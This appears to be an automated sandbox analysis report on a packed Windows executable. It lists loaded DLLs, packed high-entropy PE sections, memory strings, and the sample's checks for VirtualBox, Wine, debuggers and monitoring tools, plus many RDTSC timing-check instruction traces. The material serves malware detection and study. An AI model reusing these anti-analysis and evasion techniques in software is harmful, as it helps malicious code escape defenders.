Source: Cc8zEnIDB2.exeString found in binary or memory: OUQ/i/or+0D/hXvgD/oRvB//hM6L/8AIVH/AAr3wB/0I3g//wAJnRf/AJCo/wCJ6P8Aq1v/AJu3/wCKIf8AFKr/AKvx/wCcv/8AyiH8X9Ff2gf8K98Af9CN4P8A/CZ0X/5Co/4V74A/6Ebwf/4TOi//ACFR/wAT0f8AVrf/ADdv/wAUQ/4pVf8AV+P/ADl//wCUQ/i/or+0D/hXvgD/AKEbwf8A+Ezov/yFR/wr3wB/0I3g/wD8JnRf/kKj/iej/q1v/
Source: Cc8zEnIDB2.exeString found in binary or memory: /+vXl3/C1PB//AD86n/4LD/8AJtQt8VPCH/PzrH/grz+hvqawmIf/ADDP/wABn5eXn+DLp+y8vw/G3Xa1tfxPV/P9v0/+vUfme36//Wryv/hanhH/AJ+NY/8ABd/92Uf8LZ8Ifc+06v8A+ARx/wClvXHv074rb6niX/y4/wDJJdbeXn/Wl9Lf1f8Arv8A1Znp/mfP756+/TH9P85pFbNeU/8AC2/B6t/rtYfH/UPHT3/073/rij/hbvg//nrrn/gsX/5
Source: Cc8zEnIDB2.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Cc8zEnIDB2.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: kernel.appcore.dll
Source: Cc8zEnIDB2.exeStatic file information: File size 4430848 > 1048576
Source: Cc8zEnIDB2.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: Cc8zEnIDB2.exeStatic PE information: Raw size of sgmjipkl is bigger than: 0x100000 < 0x1b2200

Data Obfuscation

Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeUnpacked PE file: 0.2.Cc8zEnIDB2.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sgmjipkl:EW;pwaltzxf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sgmjipkl:EW;pwaltzxf:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: Cc8zEnIDB2.exeStatic PE information: real checksum: 0x43ec7b should be: 0x4420b3
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: .idata
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: sgmjipkl
Source: Cc8zEnIDB2.exeStatic PE information: section name: pwaltzxf
Source: Cc8zEnIDB2.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008541D0 push eax; mov dword ptr [esp], edx0_2_008541D5
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00552340 push eax; mov dword ptr [esp], 00000000h0_2_00552343
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0058C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0058C743
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0053EAD1 push 0099C3C1h; ret 0_2_0053EAF2
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00510AC0 push eax; mov dword ptr [esp], 00000000h0_2_00510AC4
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00531430 push eax; mov dword ptr [esp], 00000000h0_2_00531433
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005539A0 push eax; mov dword ptr [esp], 00000000h0_2_005539A3
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0052DAD0 push eax; mov dword ptr [esp], edx0_2_0052DAD1
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00859F40 push dword ptr [eax+04h]; ret 0_2_00859F6F
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_07130736 push cs; iretd 0_2_07130744
Source: Cc8zEnIDB2.exeStatic PE information: section name: sgmjipkl entropy: 7.954959217473626

Boot Survival

Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: Filemonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASS

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C622F2 second address: C622F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C57DB3 second address: C57DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C6158A second address: C61590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C61590 second address: C615A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43E91C545Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C6184D second address: C61883 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E8C1FDD6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnp 00007F43E8C1FDD6h 0x00000015 jmp 00007F43E8C1FDE0h 0x0000001a pop ebx 0x0000001b pushad 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C61883 second address: C61888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C619DE second address: C619EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C619EE second address: C61A11 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43E91C5460h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C61B36 second address: C61B47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F43E8C1FDD6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C61B47 second address: C61B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jno 00007F43E91C5456h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 je 00007F43E91C5456h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C61B67 second address: C61B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C64388 second address: C6438C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C6438C second address: C64423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E8C1FDDBh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F43E8C1FDE3h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov esi, dword ptr [ebp+122D2A9Bh] 0x00000024 clc 0x00000025 lea ebx, dword ptr [ebp+1244A186h] 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F43E8C1FDD8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D315Bh], ecx 0x0000004b add cx, ADD3h 0x00000050 xchg eax, ebx 0x00000051 ja 00007F43E8C1FDE4h 0x00000057 push eax 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F43E8C1FDE2h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C644AD second address: C644B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C644B2 second address: C644E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F43E8C1FDD6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F43E8C1FDE5h 0x00000014 push 00000000h 0x00000016 push FE63B0A5h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C644E2 second address: C6456E instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jc 00007F43E91C5456h 0x00000011 pop ecx 0x00000012 popad 0x00000013 add dword ptr [esp], 019C4FDBh 0x0000001a pushad 0x0000001b sub dword ptr [ebp+122D185Eh], ecx 0x00000021 mov si, bx 0x00000024 popad 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D3098h], eax 0x0000002f push 00000003h 0x00000031 mov cl, 66h 0x00000033 push 917C1B2Fh 0x00000038 jmp 00007F43E91C5460h 0x0000003d add dword ptr [esp], 2E83E4D1h 0x00000044 push edi 0x00000045 pop edx 0x00000046 pushad 0x00000047 movsx edx, cx 0x0000004a mov cx, si 0x0000004d popad 0x0000004e lea ebx, dword ptr [ebp+1244A18Fh] 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F43E91C5458h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e cld 0x0000006f push eax 0x00000070 js 00007F43E91C5460h 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C645D4 second address: C645D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C645D8 second address: C64644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx edi, dx 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D2BDBh] 0x00000014 call 00007F43E91C5459h 0x00000019 pushad 0x0000001a jnl 00007F43E91C5458h 0x00000020 push ebx 0x00000021 jmp 00007F43E91C5461h 0x00000026 pop ebx 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F43E91C5461h 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 jl 00007F43E91C5460h 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jnc 00007F43E91C5456h 0x00000041 popad 0x00000042 mov eax, dword ptr [eax] 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 jnc 00007F43E91C5456h 0x0000004d pop edi 0x0000004e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C64644 second address: C64649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C64649 second address: C6466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43E91C5464h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C6466C second address: C64676 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C7695D second address: C7697C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F43E91C5467h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C844C4 second address: C844C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C844C8 second address: C844CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C844CC second address: C844EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F43E8C1FDEEh 0x0000000c jmp 00007F43E8C1FDE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C844EC second address: C844F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84664 second address: C84668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84796 second address: C8479A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8479A second address: C8479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8479E second address: C847A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C847A4 second address: C847C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE9h 0x00000009 jng 00007F43E8C1FDD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C847C7 second address: C847CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C848FE second address: C84914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E8C1FDDCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84914 second address: C8491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43E91C5456h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8491E second address: C84922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84922 second address: C84928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84928 second address: C84942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84942 second address: C84948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84C50 second address: C84C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F43E8C1FDE1h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84C68 second address: C84C6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84C6D second address: C84C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E8C1FDDAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F43E8C1FDD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84EEA second address: C84EF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84EF5 second address: C84F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C84F03 second address: C84F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85056 second address: C8505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8505C second address: C85072 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43E91C5460h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85072 second address: C85097 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E8C1FDE2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jnp 00007F43E8C1FDDEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C851BE second address: C851CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C851CC second address: C851D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85339 second address: C8533D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C854C4 second address: C854C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C854C8 second address: C854CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C854CE second address: C854D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C854D4 second address: C854E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F43E91C545Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C854E9 second address: C8550E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F43E8C1FDD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85D66 second address: C85D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F43E91C5456h 0x0000000a jns 00007F43E91C5456h 0x00000010 rdtsc
